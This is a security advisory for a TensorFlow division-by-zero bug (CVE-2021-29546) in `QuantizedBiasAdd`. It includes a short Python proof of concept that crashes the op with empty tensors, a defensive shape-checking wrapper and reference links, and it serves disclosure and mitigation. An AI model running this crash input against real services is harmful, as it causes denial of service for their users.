CVE-2021-29546: Division by 0 in `QuantizedBiasAdd`
An attacker can trigger an integer division by zero (undefined behavior) in `tf.raw_ops.QuantizedBiasAdd` by passing empty input and bias tensors, as in the following proof of concept:
```python
import tensorflow as tf

# Trigger: an input tensor and a bias tensor that both contain zero elements.
input_tensor = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8)
bias = tf.constant([], shape=[0], dtype=tf.quint8)

# The quantization ranges are valid floats; the shapes, not the ranges, cause the crash.
min_input = tf.constant(-10.0, dtype=tf.float32)
max_input = tf.constant(-10.0, dtype=tf.float32)
min_bias = tf.constant(-10.0, dtype=tf.float32)
max_bias = tf.constant(-10.0, dtype=tf.float32)

tf.raw_ops.QuantizedBiasAdd(input=input_tensor, bias=bias,
                            min_input=min_input, max_input=max_input,
                            min_bias=min_bias, max_bias=max_bias,
                            out_type=tf.qint32)
```
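The real fix is the upstream commit listed in the references; the guard below is an added example (not code from the advisory or from TensorFlow) for code that must call the raw op on a build that cannot be upgraded yet. It assumes the unsafe condition is exactly what the proof of concept uses, an `input` or `bias` with zero elements, and adds the op's documented contract that `bias` is 1-D and matches the last dimension of `input`; the helper names are hypothetical.

```python
from math import prod
from typing import Sequence


class UnsafeQuantizedShape(ValueError):
    """Raised when a shape could reach the division-by-zero path in QuantizedBiasAdd."""


def validate_quantized_bias_add_shapes(input_shape: Sequence[int],
                                       bias_shape: Sequence[int]) -> None:
    """Reject shapes before they reach tf.raw_ops.QuantizedBiasAdd.

    Assumption: the vulnerable path is an empty input or bias tensor (the PoC uses
    shapes [0, 0, 0, 0] and [0]); the bias/last-dimension rule is the op's contract.
    """
    dims = [*input_shape, *bias_shape]
    if any(not isinstance(d, int) or d < 0 for d in dims):
        raise UnsafeQuantizedShape(f"dimensions must be non-negative ints: {dims}")
    if len(bias_shape) != 1:
        raise UnsafeQuantizedShape(f"bias must be 1-D, got rank {len(bias_shape)}")
    if bias_shape[0] == 0:
        raise UnsafeQuantizedShape("bias tensor is empty")
    if len(input_shape) == 0 or prod(input_shape) == 0:
        raise UnsafeQuantizedShape(f"input tensor is empty: shape {list(input_shape)}")
    if input_shape[-1] != bias_shape[0]:
        raise UnsafeQuantizedShape(
            f"bias length {bias_shape[0]} != input last dim {input_shape[-1]}")


def is_safe_quantized_bias_add(input_shape: Sequence[int],
                               bias_shape: Sequence[int]) -> bool:
    """Boolean form of the check, convenient for tests and logging."""
    try:
        validate_quantized_bias_add_shapes(input_shape, bias_shape)
        return True
    except UnsafeQuantizedShape:
        return False


def safe_quantized_bias_add(input_tensor, bias, **raw_op_kwargs):
    """Validate static shapes, then forward to the raw op (TensorFlow imported lazily)."""
    validate_quantized_bias_add_shapes(list(input_tensor.shape), list(bias.shape))
    import tensorflow as tf  # assumed available in the calling environment
    return tf.raw_ops.QuantizedBiasAdd(input=input_tensor, bias=bias, **raw_op_kwargs)
```

The check is performed on static shapes only; a tensor with an unknown (`None`) dimension is rejected because its size cannot be proven non-zero ahead of the call.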
References
- github.com/advisories/GHSA-m34j-p8rj-wjxq
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-474.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-672.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-183.yaml
- github.com/tensorflow/tensorflow/commit/67784700869470d65d5f2ef20aeb5e97c31673cb
- github.com/tensorflow/tensorflow/security/advisories/GHSA-m34j-p8rj-wjxq
- nvd.nist.gov/vuln/detail/CVE-2021-29546